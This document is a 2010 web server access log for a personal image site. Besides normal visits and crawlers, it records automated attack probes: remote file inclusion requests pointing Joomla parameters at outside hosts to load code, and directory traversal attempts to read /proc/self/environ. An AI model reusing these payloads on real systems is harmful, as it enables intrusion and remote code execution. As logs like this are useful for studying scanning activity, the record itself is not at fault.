70.191.94.116 - - [11/May/2010:17:00:31 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.191.94.116 - - [11/May/2010:17:00:31 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.191.94.116 - - [11/May/2010:17:00:31 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.191.94.116 - - [11/May/2010:17:00:31 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.191.94.116 - - [11/May/2010:17:00:31 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.191.94.116 - - [11/May/2010:17:00:31 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.191.94.116 - - [11/May/2010:17:00:31 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.191.94.116 - - [11/May/2010:17:00:31 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.191.94.116 - - [11/May/2010:17:00:31 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.191.94.116 - - [11/May/2010:17:00:31 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
124.0.74.195 - - [11/May/2010:17:03:38 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:17:03:38 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:17:03:38 -0500] "GET /logs/access_log.1228089600//admin/business_inc/saveserver.php?thisdir=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
174.121.163.241 - - [11/May/2010:17:03:51 -0500] "GET /logs/access_log.1272067200/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
174.121.163.241 - - [11/May/2010:17:03:52 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
174.121.163.241 - - [11/May/2010:17:03:52 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5130 "-""libwww-perl/5.810"
174.121.163.241 - - [11/May/2010:17:03:52 -0500] "GET /logs/access_log.1273190400/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
87.250.255.243 - - [11/May/2010:17:08:10 -0500] "GET /artwork/ HTTP/1.1" 200 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [11/May/2010:17:09:14 -0500] "GET /logs/access_log.1212969600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.0.74.195 - - [11/May/2010:17:12:46 -0500] "GET /logs/access_log.1272067200%20%20//admin/business_inc/saveserver.php?thisdir=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
87.250.255.243 - - [11/May/2010:17:12:52 -0500] "GET /logs/access_log.1272153600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.1.47.47 - - [11/May/2010:17:13:27 -0500] "GET //modules/mod_as_category.php?mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 312 "-""libwww-perl/5.813"
87.1.47.47 - - [11/May/2010:17:13:27 -0500] "GET /logs//modules/mod_as_category.php?mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 317 "-""libwww-perl/5.813"
78.137.163.133 - - [11/May/2010:17:14:05 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
78.137.163.133 - - [11/May/2010:17:14:05 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
95.131.64.69 - - [11/May/2010:17:16:41 -0500] "GET //index.php?option=com_fabrik&task=view&Itemid=&mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:17:16:41 -0500] "GET /logs/access_log.1273190400//index.php?option=com_fabrik&task=view&Itemid=&mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:17:16:41 -0500] "GET /logs/access_log.1270598400//index.php?option=com_fabrik&task=view&Itemid=&mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:17:16:41 -0500] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
220.194.62.53 - - [11/May/2010:17:17:02 -0500] "GET /logs//index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [11/May/2010:17:17:02 -0500] "GET //index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.194.62.53 - - [11/May/2010:17:17:09 -0500] "GET /logs//index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [11/May/2010:17:17:09 -0500] "GET //index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
95.131.64.69 - - [11/May/2010:17:18:54 -0500] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:17:18:54 -0500] "GET /logs/access_log.1272067200//index.php?option=com_fabrik&task=view&Itemid=&mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
95.131.64.69 - - [11/May/2010:17:18:54 -0500] "GET //index.php?option=com_fabrik&task=view&Itemid=&mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
207.46.194.40 - - [11/May/2010:17:19:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.40 - - [11/May/2010:17:19:16 -0500] "GET /costume/costume82%20copy.JPG HTTP/1.1" 200 16328 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.40 - - [11/May/2010:17:19:16 -0500] "GET /costume/thmb7.htm HTTP/1.1" 200 2938 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.40 - - [11/May/2010:17:19:17 -0500] "GET /costume/costm44.jpg HTTP/1.1" 404 303 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [11/May/2010:17:21:09 -0500] "GET /artwork/toys.htm HTTP/1.1" 200 1337 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:17:21:11 -0500] "GET /logs/access_log.1217548800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:17:21:13 -0500] "GET /logs/access_log.1218240000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:17:21:16 -0500] "GET /logs/access_log.1224288000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:17:21:18 -0500] "GET /logs/access_log.1230076800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:17:21:20 -0500] "GET /logs/access_log.1238112000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
95.131.64.69 - - [11/May/2010:17:22:38 -0500] "GET /logs/access_log.1270598400//index.php?option=com_fabrik&task=view&Itemid=&mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.195.235 - - [11/May/2010:17:23:39 -0500] "GET /logs/access_log.1176163200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [11/May/2010:17:23:52 -0500] "GET /artwork/jewelrybox.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.194.53 - - [11/May/2010:17:24:47 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.53 - - [11/May/2010:17:24:47 -0500] "GET /costume/costume70.JPG HTTP/1.1" 200 60587 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.45 - - [11/May/2010:17:28:39 -0500] "GET /logs/access_log.1255132800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.194.62.53 - - [11/May/2010:17:29:09 -0500] "GET /logs/access_log.1273190400//index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
220.194.62.53 - - [11/May/2010:17:29:09 -0500] "GET //index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.194.62.53 - - [11/May/2010:17:29:09 -0500] "GET /logs//index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [11/May/2010:17:29:13 -0500] "GET /logs/access_log.1273190400//index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
220.194.62.53 - - [11/May/2010:17:29:13 -0500] "GET //index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.194.62.53 - - [11/May/2010:17:29:13 -0500] "GET /logs//index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.46.194.84 - - [11/May/2010:17:31:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.84 - - [11/May/2010:17:31:38 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [11/May/2010:17:34:50 -0500] "GET /artwork/music.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
195.9.14.148 - - [11/May/2010:17:35:23 -0500] "GET /logs/access_log.1272067200/index.php?option=com_calendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.21.247.137 - - [11/May/2010:17:35:32 -0500] "GET /logs//index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
59.21.247.137 - - [11/May/2010:17:35:32 -0500] "GET //index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.250.255.243 - - [11/May/2010:17:39:33 -0500] "GET /logs/access_log.1271203200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
77.222.56.62 - - [11/May/2010:17:42:12 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.222.56.62 - - [11/May/2010:17:42:13 -0500] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.222.56.62 - - [11/May/2010:17:42:44 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.222.56.62 - - [11/May/2010:17:42:44 -0500] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.218.116.166 - - [11/May/2010:17:45:03 -0500] "GET /logs/access_log.1238630400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.42 - - [11/May/2010:17:46:04 -0500] "GET /logs/access_log.1246060800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.199.211 - - [11/May/2010:17:46:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.211 - - [11/May/2010:17:46:46 -0500] "GET /costume/costume93%20copy.JPG HTTP/1.1" 200 16031 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.211 - - [11/May/2010:17:46:49 -0500] "GET /costume/costume84%20copy.JPG HTTP/1.1" 200 15105 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
77.222.56.62 - - [11/May/2010:17:48:37 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.222.56.62 - - [11/May/2010:17:48:38 -0500] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
216.118.130.127 - - [11/May/2010:17:53:10 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://tatthoo.com/tattoocat32.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:10 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:17 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:17 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:17 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:17 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:17 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:17 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:17 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:17 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:17 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:17 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:17 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:30 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:30 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:30 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:30 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:30 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:30 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:30 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:30 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:31 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:31 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:31 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:40 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:40 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:40 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:40 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:40 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:40 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:40 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:40 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:40 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:40 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:40 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
216.118.130.127 - - [11/May/2010:17:53:55 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
